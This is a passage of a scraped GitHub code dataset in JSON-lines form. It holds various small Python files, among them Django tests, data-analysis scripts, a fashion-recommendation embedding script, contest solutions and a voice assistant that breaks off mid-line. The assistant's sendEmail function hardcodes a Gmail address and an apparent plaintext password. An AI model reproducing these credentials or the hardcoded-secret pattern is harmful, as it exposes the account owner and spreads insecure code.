test_next_ok(login, jp_base_url, next_path):\n next_path = next_path.format(base_url=jp_base_url)\n expected = jp_base_url + next_path\n actual = await login(next=expected)\n assert actual == expected\n","repo_name":"xinyangwy/doubanFlask","sub_path":"venv/Lib/site-packages/jupyter_server/tests/auth/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"34"} +{"seq_id":"22130038862","text":"import glob\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef mean(tl):\r\n return sum(tl) / len(tl)\r\n\r\ndef median(tl):\r\n n = len(tl)\r\n tl.sort()\r\n\r\n if n % 2 == 0:\r\n m1 = tl[n//2]\r\n m2 = tl[n//2 - 1]\r\n return (m1 + m2)/2\r\n else:\r\n return tl[n//2]\r\n\r\nif __name__ == \"__main__\":\r\n # JOb completion times mean and median\r\n with open('master.log', 'r') as file:\r\n tct = [] #task completion time\r\n while True:\r\n #extract times of each job stored in a separate line\r\n line = file.readline()\r\n if not line:\r\n break\r\n tct.append(float(line.split(':')[-1]))\r\n\r\n print('mean(jobs) = ', str(mean(tct)))\r\n print('median(jobs) = ', str(median(tct)))\r\n\r\n # Task completion times mean and meadian\r\n files = glob.glob('worker*.log')\r\n tct = []\r\n num_tasks = []\r\n etimes = [] #execution times\r\n tasks = []\r\n s = 1\r\n for f in files:\r\n c, t = 0, 0\r\n with open(f, 'r') as file:\r\n while True:\r\n #extract times of each job stored in a separate line\r\n line = file.readline()\r\n if not line:\r\n break\r\n tt = float(line.split(':')[-1])\r\n c = c + 1\r\n t = t + tt\r\n tct.append(tt)\r\n num_tasks.append(c)\r\n etimes.append(t)\r\n tasks.append('W' + str(s) + '(' + str(c) + ')')\r\n s = s + 1\r\n\r\n\r\n print('mean(tasks) = ', str(mean(tct)))\r\n print('median(tasks) = ', str(median(tct)))\r\n\r\n # creating the bar plot\r\n fig = plt.figure()\r\n plt.bar(tasks, etimes, color ='maroon', width = 0.4)\r\n plt.ylabel(\"Time\")\r\n plt.xlabel(\"No. of num_tasks scheduled\")\r\n plt.title(\"Number of num_tasks scheduled on each machine against time\")\r\n plt.show()\r\n","repo_name":"rajanyav/big_data","sub_path":"big data project/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27734140203","text":"from dessia_common.core import DessiaObject\nimport dessia_common.checks as checks\n\n\nclass Battery(DessiaObject):\n \"\"\" Mock a battery. \"\"\"\n\n def __init__(self, capacity: float, number_cells: int, name: str = ''):\n\n DessiaObject.__init__(self, name=name)\n self.capacity = capacity\n self.number_cells = number_cells\n\n def check_list(self, level='info'):\n check_list = DessiaObject.check_list(self, level=level, check_platform=False)\n\n check_list += checks.is_float(self.capacity, level=level)\n check_list += checks.is_int(self.number_cells, level=level)\n check_list += checks.is_str(self.name, level=level)\n\n return check_list\n\n\nBATTERY = Battery(3., 2, 'Good name')\nCHECK_LIST = BATTERY.check_list()\nprint(CHECK_LIST)\nCHECK_LIST.raise_if_above_level('error')\n\nBATTERY = Battery(None, 22.2, 1)\nINVALID_CHECK_LIST = BATTERY.check_list()\nprint(INVALID_CHECK_LIST)\n\nraised = False\ntry:\n INVALID_CHECK_LIST.raise_if_above_level('error')\nexcept:\n raised = True\n\nassert raised\n\n\nclass ElectricChar2(DessiaObject):\n \"\"\" Mock a system using a battery. \"\"\"\n\n def __init__(self, battery: Battery, brand: str, model: str, price: int, autonomy: int, name: str = ''):\n\n DessiaObject.__init__(self, name=name)\n self.battery = battery\n self.brand = brand\n self.model = model\n self.price = price\n self.autonomy = autonomy\n","repo_name":"Dessia-tech/dessia_common","sub_path":"tests/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8593587729","text":"from django.urls import path, include\n\nfrom . import views\n\nurlpatterns = [\n path('login/', views.login_view, name='login'),\n path('logout/', views.logout_view, name='logout'),\n path('callback/', views.get_access_token, name='get_access_token'),\n path('settings/', views.settings, name='settings'),\n path('delete-account/', views.delete_account, name='delete_account'),\n]\n","repo_name":"maxamuss/Warwick-CATulator","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"14429722959","text":"SETTING_FILENAME = 'filename'\nSETTING_RECENT_FILES = 'recentFiles'\nSETTING_WIN_SIZE = 'window/size'\nSETTING_WIN_POSE = 'window/position'\nSETTING_WIN_GEOMETRY = 'window/geometry'\nSETTING_LINE_COLOR = 'line/color'\nSETTING_FILL_COLOR = 'fill/color'\nSETTING_ADVANCE_MODE = 'advanced'\nSETTING_WIN_STATE = 'window/state'\nSETTING_SAVE_DIR = 'savedir'\nSETTING_PAINT_LABEL = 'paintlabel'\nSETTING_LAST_OPEN_DIR = 'lastOpenDir'\nSETTING_PREPROCESSING_PATH = 'preProcessing'\nSETTING_CSVDATABASE = 'csvDB'\nSETTING_AUTO_SAVE = 'autosave'\nSETTING_RECOMMENDER = 'recommend'\nSETTING_SINGLE_CLASS = 'singleclass'\nFORMAT_PASCALVOC='PascalVOC'\nFORMAT_YOLO='YOLO'\nFORMAT_CREATEML='CreateML'\nFORMAT_CSV = 'CSV'\nFORMAT_ONECSV = 'ONECSV'\nSETTING_DRAW_SQUARE = 'draw/square'\nSETTING_LABEL_FILE_FORMAT= 'labelFileFormat'\nDEFAULT_ENCODING = 'utf-8'\nBUTTON_CSS = \"background-image : url(xxxxx.jpg);margin: 1px; padding: 10px;\\\n background-color: \\\n rgba(255,255,0,255); \\\n color: rgba(0,0,0,255); \\\n border-style: solid; \\\n border-radius: 4px; border-width: 3px; \\\n border-color: rgba(0,0,0,255);\"\nSETTING_PREPATH = 'prepath'","repo_name":"mrelmi/LabelFace","sub_path":"libs/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23180787917","text":"from pprint import pprint\n\n\ndef unfair_districts(number, data):\n height, width = len(data), len(data[1])\n valid = {(x, y) for y in range(width) for x in range(height)}\n out = [['']*width for _ in range(height)]\n stack = [((0, 0), [((0,0),)])]\n while stack:\n (x, y), area = stack.pop()\n\n last_group = area.pop()\n # считаем сумму людей в last_group, если большечем надо, то цикл заново, этот элемент из стека удал\n # если ровно как надо - возвращаем last_group в area: -- area, last_group = area+[last_group], ()\n neighbors = {(x+1, y), (x-1, y), (x, y+1), (x, y-1)} & valid\n for i in (neighbors - set(sum(area, ())+last_group)): # делаем цикл по соседям тек клетки кроме тех что в ареа\n stack += [(i, area+[last_group+(i,)])] # в стек добавляем текущий сосед, в список тек кл в посл группу, или\n # создаём новую группу с первой текущей ячейкой. Делаем новые стеки и вконце тек сосед. Передняя цифра всегда = ячейке в конце\n if len(last_group) in [1, 2]:# не делаем если ячейка новая в конце одна, в этом сл ластгр пустой\n stack += [(last_group[-1], area+[last_group+(i,)])] # делаем строчку где в начале предыд яч а в конце новая\n # если есть другие соседи у последней ячейки замкнувшей предыд последовательность => будут еще строчки с новой ячейкой\n #\n\nif __name__ == '__main__':\n pprint(unfair_districts(5, [[[2, 1], [1, 1], [1, 2]],\n [[2, 1], [1, 1], [0, 2]]]))\n#\n# pprint(unfair_districts(9, [[[0, 3], [3, 3], [1, 1], [3, 3]],\n# [[1, 2], [1, 0], [1, 1], [1, 1]],\n# [[0, 3], [2, 1], [2, 2], [1, 0]]]))\n\n# pprint(unfair_districts(9, [\n# [[0, 3], [3, 3], [1, 1]],\n# [[1, 2], [1, 0], [1, 1]],\n# [[0, 3], [2, 1], [2, 2]]]))\n# from itertools import chain\n# from collections import defaultdict\n#\n# def checker(solution, amount_of_people, grid, win_flg=True):\n#\n# w, h = len(grid[0]), len(grid)\n# size = w * h\n# cell_dic = {}\n#\n# # make cell_dic\n# def adj_cells(cell):\n# result = []\n# if cell % w != 1 and cell - 1 > 0:\n# result.append(cell - 1)\n# if cell % w and cell + 1 <= size:\n# result.append(cell + 1)\n# if (cell - 1) // w:\n# result.append(cell - w)\n# if (cell - 1) // w < h - 1:\n# result.append(cell + w)\n# return set(result)\n#\n# for i, v in enumerate(chain(*grid)):\n# cell_dic[i + 1] = {'vote': v, 'adj': adj_cells(i + 1)}\n#\n# answer = solution(amount_of_people, grid)\n#\n# if answer == [] and not win_flg:\n# return True\n#\n# if not isinstance(answer, list):\n# print('wrong data type :', answer)\n# return False\n# else:\n# if len(answer) != h:\n# print('wrong data length', answer)\n# return False\n# for an in answer:\n# if len(an) != w:\n# print('wrong data length', an)\n# return False\n#\n# ds_dic = defaultdict(list)\n# for i, r in enumerate(''.join(answer), start=1):\n# ds_dic[r].append(i)\n#\n# # answer check\n# def district_check(d):\n# all_cells = set(d[1:])\n# next_cells = cell_dic[d[0]]['adj'] & set(d)\n# for _ in range(len(d)):\n# all_cells -= next_cells\n# next_cells = set(chain(*[list(cell_dic[nc]['adj']) for nc in next_cells])) & set(d)\n# return not all_cells\n#\n# for ch, cells in ds_dic.items():\n# dist_people = sum(sum(cell_dic[c]['vote']) for c in cells)\n# if not district_check(cells):\n# print('wrong district: ', ch)\n# return False\n# if dist_people != amount_of_people:\n# print('wrong people:', ch)\n# return False\n#\n# # win check\n# win, lose = 0, 0\n# for part in ds_dic.values():\n# vote_a, vote_b = 0, 0\n# for p in part:\n# a, b = cell_dic[p]['vote']\n# vote_a += a\n# vote_b += b\n# win += vote_a > vote_b\n# lose += vote_a < vote_b\n#\n# return win > lose\n#\n# assert checker(unfair_districts, 5, [\n# [[2, 1], [1, 1], [1, 2]],\n# [[2, 1], [1, 1], [0, 2]]]), '3x2grid'\n#\n# assert checker(unfair_districts, 9, [\n# [[0, 3], [3, 3], [1, 1]],\n# [[1, 2], [1, 0], [1, 1]],\n# [[0, 3], [2, 1], [2, 2]]]), '3x3gid'\n#\n# assert checker(unfair_districts, 8, [\n# [[1, 1], [2, 0], [2, 0], [3, 3]],\n# [[1, 1], [1, 2], [1, 1], [0, 3]],\n# [[1, 1], [1, 1], [1, 2], [0, 3]],\n# [[1, 1], [1, 1], [1, 1], [2, 0]]]), '4x4gid'\n#\n# print('check done')\n","repo_name":"WitalyK/Python_Stepik","sub_path":"checkio.py","file_name":"checkio.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25414122676","text":"import streamlit as st\nfrom data import data\nimport pandas as pd\nfrom util import util\nfrom babel.numbers import format_currency, format_number\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\n\n\ndf = data.getDataFrame(dataset_path='data/order_payments_dataset.csv')\n\nst.title('Analysis Result')\nst.divider()\n\nst.subheader('Payment Type')\n\nwith st.container():\n payment_type_freq = df[['payment_type']].groupby('payment_type')\\\n .value_counts().to_frame(name='freq').sort_values(by=['freq'], ascending=False)\n\n col1, col2 = st.columns(2)\n\n with col1:\n \n st.metric(\n label='Most Used Payment Type',\n value=util.reformatIndexToStr(str(payment_type_freq.index[0]))\n )\n\n with col2:\n\n st.metric(\n label='Payment Frequency',\n value=format_number(\n payment_type_freq.sum()['freq'],\n locale='en_US'\n )\n )\n\n col_colors = ['grey' if(freq < max(payment_type_freq['freq'])) else 'orange' for freq in payment_type_freq['freq']]\n\n fig, ax = plt.subplots()\n\n ax = sns.barplot(\n data=payment_type_freq,\n x='freq',\n y=payment_type_freq.index,\n orient='h',\n palette=col_colors,\n ax=ax\n )\n\n ax.set(\n title='Frequency of Payment Type',\n xlabel='Frequency',\n ylabel='Payment Type'\n )\n\n ax.tick_params(axis='x', rotation=45)\n ax.xaxis.set_major_formatter(ticker.FuncFormatter(lambda x, pos: f'{int(x):,}'))\n\n st.pyplot(fig)\n\n\n\nwith st.container():\n col1, col2 = st.columns(2)\n\n payment_sum_by_type = df.groupby('payment_type').agg(\n payment_sum = pd.NamedAgg(column='payment_value',\n aggfunc='sum')\n ).sort_values(by=['payment_sum'], ascending=False)\n\n with col1:\n \n st.metric(\n label='Most Used Payment Type',\n value=util.reformatIndexToStr(str(payment_sum_by_type.index[0]))\n )\n\n with col2:\n total_payment_str = format_currency(\n payment_sum_by_type.sum()['payment_sum'], \n 'USD', \n locale='en_US'\n )\n\n st.metric(\n label='Total Payment',\n value=total_payment_str\n )\n\n col_colors = ['gray' if(sum < max(payment_sum_by_type['payment_sum'])) else 'orange' for sum in payment_sum_by_type['payment_sum']]\n\n fig, ax = plt.subplots()\n\n sns.barplot(\n data=payment_sum_by_type,\n x='payment_sum',\n y=payment_sum_by_type.index,\n palette=col_colors,\n ax=ax\n )\n\n ax.set(\n title='Total Payment by Payment Type',\n xlabel='Total Payment',\n ylabel='Payment Type'\n )\n\n ax.tick_params(axis='x', rotation=45)\n ax.xaxis.set_major_formatter(ticker.FuncFormatter(lambda x, pos: f'{int(x):,}'))\n\n st.pyplot(fig)\n\nst.divider()\n\nst.subheader('Payment Type Distribution')\nwith st.container():\n installment_and_value_by_type = df.loc[\n :, \n ['payment_installments', 'payment_value', 'payment_type']\n ]\n\n fig, ax = plt.subplots()\n\n sns.scatterplot(\n data=installment_and_value_by_type,\n x='payment_installments',\n y='payment_value',\n hue='payment_type',\n ax=ax\n )\n\n ax.set(\n title='Distribution of Payment Type on Payment Value vs Payment Installment',\n xlabel='Payment Installment',\n ylabel='Payment Value'\n )\n\n ax.yaxis.set_major_formatter(ticker.FuncFormatter(lambda x, pos: f'{int(x):,}'))\n\n st.pyplot(fig)\n\n st.markdown(\n '''\n The payment type distribution on payment value vs payment installment shows some interesting informations:\n - The distribution of payment using credit card has positive skewness and the range is from 0 -24. The payment installment using credit card centered in 5 - 10.\n - There's a extreme payment value done using credit card with 1 installment with value 14,000.\n - The other payment categories are lie on first installment. Among these 4 payment categories, buleto has several transactions with value from 6,000 - ~7,800\n '''\n )","repo_name":"Gustana/order_payments_analysis","sub_path":"dashboard/page/analysis_res.py","file_name":"analysis_res.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28730873926","text":"#!/bin/python\n## This file calulates the cost owed by each person.\n\ndict={}\n#str=\"\"\ndef calc_price_each_person_mobile(arr1) :\n str=\"\"\n\n for i in range(len(arr1)) :\n if arr1[i][:4]!=\"AT&T\" : ## Eliminates Wearable header\n if arr1[i][0] !=\"$\" : ## Getting only phone number and user name\n str=str+arr1[i]+\" \" ## creating key for dictionary\n else :\n if arr1[i-1][0] !=\"$\" : ## eliminating feature att also displays if price has increased for user\n user_name=str.split(\" \")[1:]\n users=\" \".join(user_name).strip()\n dict[users]=dict.get((users),0)+float(arr1[i][1:]) ## adding values. Some users can have multiple devices\n str=\"\"\n return dict\n\ndef internet_charges_per_person(arr1,insurance) :\n num_users = int(arr1[2].split(\" \")[0]) ## Getting the number of users\n #print num_users\n total_cost_for_internet=float(arr1[3][1:]) ## shared price for users\n #print total_cost_for_internet\n internet_charge_per_person=total_cost_for_internet/num_users ## splitting cost for internet\n insurance_cost_per_person=insurance/num_users ## splitting cost for insurance\n return internet_charge_per_person+insurance_cost_per_person\n\n\n## Just to round off the values\ndef rounding_values(x):\n return(round(x+0.001,2))\n\n## Modyfing the dictionary mobile_charges\ndef calc_amount_owed(mobile,extra,main_user,insurance) :\n for i in mobile.keys() :\n if i == main_user: ## main user is charged for insurance. Subtracting the cost from his bill and splitting to everyone.\n mobile[i]=mobile.get(i)-insurance\n mobile[i]=mobile.get(i)+extra\n mobile[i]=rounding_values(mobile.get(i))\n return mobile ## dictionary with final values\n","repo_name":"abhinavda/att_bill_calculator","sub_path":"calculating_cost.py","file_name":"calculating_cost.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"29392990569","text":"import shutil\nimport tempfile\nfrom http import HTTPStatus\n\nfrom ..forms import PostForm\nfrom ..models import Group, Post\nfrom django.conf import settings\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\n\n# Создаем временную папку для медиа-файлов;\n# на момент теста медиа папка будет переопределена\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\nUser = get_user_model()\n\nclass TaskPostFormTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.author = User.objects.create_user(username='NoName')\n cls.group = Group.objects.create(\n title='test_title',\n description='test_description',\n slug='test-slug'\n )\n cls.post = Post.objects.create(\n text='test_post',\n author=cls.author,\n group=cls.group\n )\n # Создаем форму, если нужна проверка атрибутов\n cls.form = PostForm()\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n\n def setUp(self):\n # Создаем неавторизованный клиент\n self.user = User.objects.create_user(username='User')\n self.authorized_client = Client()\n self.authorized_client.force_login(self.author)\n\n def test_create_post(self):\n \"\"\"Валидная форма создает запись в Post.\"\"\"\n # Подсчитаем количество записей в Task\n posts_count = Post.objects.count()\n\n form_data = {\n 'text': 'Тестовый текст',\n 'group': self.group.id,\n }\n\n # Отправляем POST-запрос\n response = self.authorized_client.post(\n reverse('posts:post_create'),\n data=form_data,\n follow=True\n )\n\n self.assertEqual(Post.objects.count(), posts_count + 1)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertTrue(Post.objects.filter(text='Тестовый текст').count())\n\n def test_edit_post(self):\n \"\"\"Валидная форма редактирует пост\"\"\"\n posts_count = Post.objects.count()\n\n form_data = {\n 'text': 'Отредактированный текст',\n 'group': self.group.id,\n }\n\n response = self.authorized_client.post(\n reverse('posts:post_edit', args=({self.post.id})),\n data=form_data,\n follow=True\n )\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertRedirects(response, reverse(\"posts:post_detail\", kwargs={\"post_id\": self.post.id}))\n self.assertEqual(Post.objects.count(), posts_count)\n self.assertTrue(Post.objects.filter(text='Отредактированный текст').count())\n","repo_name":"kda99/hw03_forms","sub_path":"yatube/posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39852980120","text":"'''\nUnusual units of measure which no doubt are still of some use.\n\nSources:\nhttps://en.wikipedia.org/wiki/List_of_humorous_units_of_measurement\n'''\n\nfrom noether.core import Unit, UnitSet\n\nfrom ..prefixes import SI_all\nfrom ..fundamental import second\nfrom ..scientific import minute, watt_hour, sievert, angstrom, sol\nfrom ..conventional import inch, hour, year\n\n# % Length\nbeard_second = Unit(\n angstrom * 100, \"beard_second\",\n info=\"According to popular convention, although the average figure is close to half of this.\")\n\n# % Time\nwarhol = Unit(minute * 15, \"warhol\", prefixes=SI_all,\n info=\"Warhol's \\\"fifteen minutes of fame\\\"\")\nbeard_inch = Unit(inch / (beard_second/second), \"beard_inch\")\n\ndog_year = Unit(\n year / 7, \"dog_year\",\n info=\"This is a very approximate measure and dependent on breed and size\")\n\n# % Energy and radiation\n# https://blog.xkcd.com/2011/03/19/radiation-chart/\nBED = banana_equivalent_dose = Unit(\n sievert * 1e-7, \"banana_equivalent_dose\", \"BED\",\n info=\"c.f. xkcd radiation chart for other useful radiation units\")\nflight_dose_rate = Unit(\n sievert * 4e-9 / hour, \"flight_dose_rate\", \"FED\",\n info=\"Standardised ionizing radiation at 10km cruising altitude\")\n\npirate_ninja = Unit(\n watt_hour * 1000 / sol, \"pirate_ninja\", \"pn\",\n info=\"1 kWh per Martian day, from Andy Weir's The Martian\")\n","repo_name":"yunruse/Noether","sub_path":"noether/catalogue/humorous/unusual.py","file_name":"unusual.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"15807056806","text":"'''\nAuthor: Bappy Ahmed\nEmail: entbappy73@gmail.com\nDate:05-Nov-2021\n'''\n\nfrom src.utils.all_utils import read_yaml, create_directory\nimport argparse\nimport os\nimport logging\nimport pickle\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.layers import GlobalMaxPooling2D\nfrom tensorflow.keras.applications.resnet50 import ResNet50,preprocess_input\nimport numpy as np\nfrom numpy.linalg import norm\nfrom tqdm import tqdm\n\n\n\nlogging_str = \"[%(asctime)s: %(levelname)s: %(module)s]: %(message)s\"\nlog_dir = \"logs\"\nos.makedirs(log_dir, exist_ok=True)\nlogging.basicConfig(filename=os.path.join(log_dir, 'running_logs.log'), level=logging.INFO, format=logging_str,\n filemode=\"a\")\n\n\n\ndef extract_features(img_path,model):\n img = image.load_img(img_path,target_size=(224,224))\n img_array = image.img_to_array(img)\n expanded_img_array = np.expand_dims(img_array, axis=0)\n preprocessed_img = preprocess_input(expanded_img_array)\n result = model.predict(preprocessed_img).flatten()\n normalized_result = result / norm(result)\n\n return normalized_result\n\n\ndef embedding(config_path,params_path):\n \n config = read_yaml(config_path)\n params = read_yaml(params_path)\n\n artifacts = config['artifacts']\n\n artifacts_dir = artifacts['artifacts_dir']\n pickle_format_data_dir = artifacts['pickle_format_data_dir']\n img_pickle_file_name = artifacts['img_pickle_file_name']\n\n feature_extraction_dir = artifacts['feature_extraction_dir']\n extracted_features_name = artifacts['extracted_features_name']\n\n raw_local_dir_path = os.path.join(artifacts_dir, pickle_format_data_dir)\n feature_extraction_path = os.path.join(artifacts_dir, feature_extraction_dir)\n\n create_directory(dirs=[raw_local_dir_path,feature_extraction_path])\n \n pickle_file = os.path.join(raw_local_dir_path, img_pickle_file_name)\n features_name = os.path.join(feature_extraction_path, extracted_features_name)\n\n data_path = params['base']['data_path']\n weight = params['base']['weights']\n include_tops = params['base']['include_top']\n\n\n model = ResNet50(weights= weight,include_top=include_tops,input_shape=(224,224,3))\n model.trainable = False\n\n model = tf.keras.Sequential([\n model,\n GlobalMaxPooling2D()\n ])\n\n \n filenames = []\n\n for file in os.listdir(data_path):\n filenames.append(os.path.join(data_path,file))\n\n feature_list = []\n\n for file in tqdm(filenames):\n feature_list.append(extract_features(file,model))\n\n pickle.dump(feature_list,open(features_name,'wb'))\n pickle.dump(filenames,open(pickle_file,'wb'))\n\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser()\n args.add_argument(\"--config\", \"-c\", default=\"config/config.yaml\")\n args.add_argument(\"--params\", \"-p\", default=\"params.yaml\")\n parsed_args = args.parse_args()\n \n try:\n logging.info(\">>>>> stage_01 started\")\n embedding(config_path = parsed_args.config, params_path= parsed_args.params)\n logging.info(\"stage_01 completed!>>>>>\")\n except Exception as e:\n logging.exception(e)\n raise e\n \n","repo_name":"entbappy/Deep-Learning-Based-Fasion-Recommendation-System","sub_path":"src/01_generate_embedding.py","file_name":"01_generate_embedding.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"34"} +{"seq_id":"74042224418","text":"# https://codingcompetitions.withgoogle.com/kickstart/round/0000000000201b77/0000000000201bfd\n# Use PyPy2 to run it, it does not pass the TLE with Python 3/2\n\ninf = float('inf')\nT = int(input())\nfor t in range(T):\n N, Ts, Tf = map(int,raw_input().split())\n D = [[inf for _ in range(N)] for __ in range(N)]\n for x in range(N-1):\n W, P, V = map(int,raw_input().split())\n if x == 0:\n D[1][0] = W + V\n D[1][1] = max(Ts,W) + (P-(Ts-min(Ts,W))%P)%P + V\n else:\n for y in range(x+2):\n if y == 0: #Ciudad x con vistas 0\n Ac = D[x][0]\n m = max(Ac,W) + (P-(Ac-min(Ac,W))%P)%P + V\n elif y == x+1: #Ciudad x con vistas x\n Ac = D[x][y-1]\n m = max(Ac+Ts,W) + (P-(Ac+Ts-min(Ac+Ts,W))%P)%P + V\n else: #Ciudad x con vistas y\n Al = D[x][y-1]\n l = max(Al+Ts,W) + (P-(Al+Ts-min(Al+Ts,W))%P)%P + V\n \n Ar = D[x][y]\n r = max(Ar,W) + (P-(Ar-min(Ar,W))%P)%P + V\n \n m = min(l,r)\n \n if m <= Tf:\n D[x+1][y] = m\n else:\n break\n \n maxim = -1\n for x in range(N):\n if D[N-1][x] <= Tf:\n maxim = x\n else:\n break\n \n ans = maxim if maxim >= 0 else 'IMPOSSIBLE'\n print('Case #{}: {}'.format(t+1,ans))","repo_name":"Ualabi/Past_Google_Kick_Starts","sub_path":"2017/Round D/1 Sightseeing [Pypy2].py","file_name":"1 Sightseeing [Pypy2].py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"70007043939","text":"list = [1, 2, 11, 2, 5, 3, 5, 1, 3, 3, 11, 8, 7, 6]\n\ncount = 0\nwhile len(list) > 0:\n el = list[0]\n for i in range(len(list)):\n if el == list[i - count]:\n del list[i - count]\n count += 1\n print(f\"Element {el} occurrences - {count}\")\n count = 0\n","repo_name":"unicode368/PythonExercises","sub_path":"day8/count_occurences_with_loops.py","file_name":"count_occurences_with_loops.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15239351007","text":"from importlib import *\nimport pyttsx3\nimport datetime\nimport speech_recognition as sr\nimport wikipedia\nimport webbrowser\nimport os\nimport random\nimport smtplib\nfrom test import *\nimport requests\nfrom bs4 import BeautifulSoup\nimport pyjokes\n\nengine = pyttsx3.init('sapi5')\nrate = engine.getProperty('rate')\nengine.setProperty('rate',200)\nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[1].id)\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\ndef wishMe():\n hour = int(datetime.datetime.now().hour)\n if hour>=0 and hour<12:\n speak(\"Good Morning PG\")\n\n elif hour>=12 and hour<18:\n speak(\"Good Afternoon PG\") \n\n else:\n speak(\"Good Evening PG\") \n speak(\"I am Friiday. Please tell me how may I help you\") \n \n \ndef takecommand():\n r=sr.Recognizer()\n with sr.Microphone() as source:\n r.energy_threshold = 1000\n r.adjust_for_ambient_noise(source,1.2)\n r.pause_threshold = 1\n print(\"listening........\")\n audio = r.listen(source)\n try:\n print(\"Recognizing........\")\n query=r.recognize_google(audio,language='en-in')\n print(f\"user said:{query}\\n\")\n except Exception as e:\n print(\"say it again please....\")\n return \"none\"\n return query\n\ndef sendEmail(to,content):\n server=smtplib.SMTP('smtp.gmail.com',587)\n server.ehlo()\n server.starttls()\n server.login('prashikgavali500@gmail.com','Saad@1234')\n server.sendmail('geniusnobita2604@gmail.com',to,content)\n server.close()\n\nif __name__==\"__main__\": \n while True:\n wishMe()\n query = takecommand().lower()\n if 'friday'in query:\n wishMe()\n while True:\n query= takecommand().lower()\n # logic for executing tasks based on query\n if 'wikipedia' in query:\n speak('searching wikipedia')\n query = query.replace('wikipedia',\"\")\n results = wikipedia.summary(query,sentences=2)\n speak('According to wikipedia..')\n print(results)\n speak(results)\n # elif \"temperature\" in query:\n\n elif 'open youtube' in query:\n webbrowser.open('youtube.com')\n if 'close youtube' in query:\n webbrowser.open('youtube.com')\n elif 'open google' in query: \n webbrowser.open('google.com')\n elif 'open stackoverflow' in query:\n webbrowser.open('stackoverflow.com')\n elif 'play music' in query:\n music_dir = 'C:\\\\Users\\\\Hp\\Music'\n songs = os.listdir(music_dir)\n print(songs)\n os.startfile(os.path.join(music_dir,random.choice(songs)))\n elif 'time' in query:\n strTime=datetime.datetime.now().strftime('%H'\"hour\"'%M'\"minutes\"'%S'\"seconds\")\n speak(f\"sir,the time is{strTime}\")\n elif 'joke' in query:\n speak(pyjokes.get_joke())\n elif 'open vs code' in query:\n path=\"C:\\\\Users\\\\Sonu\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\n os.startfile(path)\n elif 'open chrome' in query:\n path = \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"\n os.startfile(path)\n elif 'email to ' in query:\n try:\n speak (\"what should i say?\")\n content=takecommand()\n to='geniusnobita2604@gmail.com'\n sendEmail(to,content)\n speak('email has been sent!')\n except Exception as e:\n print(e)\n speak('sorry my friend Prashik. i am unable to send this email ')\n elif 'your developer' in query:\n speak(\"PG is my developer.\") \n elif \"what's my name\" in query:\n speak(\"PG\") \n elif 'temperature' in query:\n search='temperature in Kolhapur'\n url=f\"https://www.google.com/search?q={search}\"\n x=requests.get(url)\n data=BeautifulSoup(x.text,'html.parser')\n temp= data.find(\"div\",class_=\"BNeawe\").text\n speak(f\"current {search} is {temp}\")\n elif \"remember that\" in query:\n rememberMessage = query.replace(\"remember that\",\"\")\n rememberMessage = query.replace(\"jarvis\",\"\")\n speak(\"You told me \"+rememberMessage)\n # remember= open(\"Remember.txt\", \"x\")\n remember = open(\"Remember.txt\",\"w+\")\n remember.write(rememberMessage)\n remember.close()\n elif \"what do you remember\" in query:\n remember =open(\"Remember.txt\", \"x\")\n remember = open(\"Remember.txt\",\"r\")\n speak(\"You told me \" + remember.read()) \n elif \"search\" in query and \"google\" in query:\n query = query.replace(\"search\",\"\")\n query = query.replace(\"on google\",\"\")\n query = query.replace(\"google\",\"\")\n string = query.split()\n search = \"\"\n for i in string:\n search += i\n search += \"+\"\n webbrowser.open(f\"https://www.google.com/search?q={search}&oq={search}&aqs=chrome.0.69i59j0i22i30l9.3639j0j15&sourceid=chrome&ie=UTF-8\")\n\n elif \"search\" in query and \"youtube\" 